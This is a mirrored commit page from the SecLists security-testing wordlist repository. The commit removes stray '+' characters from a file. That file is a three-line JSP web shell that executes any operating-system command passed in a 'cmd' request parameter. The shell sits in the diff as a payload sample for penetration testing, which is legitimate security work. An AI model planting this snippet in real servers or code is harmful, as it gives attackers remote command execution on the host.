mirror of
https://github.com/danielmiessler/SecLists.git
synced 2025-07-18 09:49:26 -04:00
fix file
remove what seems to be a git addition (`+`)
This commit is contained in:
parent
9196a19470
commit
2affd894a4
1 changed files with 3 additions and 3 deletions
|
@ -1,3 +1,3 @@
|
||||||
+<%
|
<%
|
||||||
+Runtime.getruntime().exec(request.getParameter("cmd"))
|
Runtime.getruntime().exec(request.getParameter("cmd"))
|
||||||
+%>
|
%>
|
||||||
|
|
Loading…
Add table
Reference in a new issue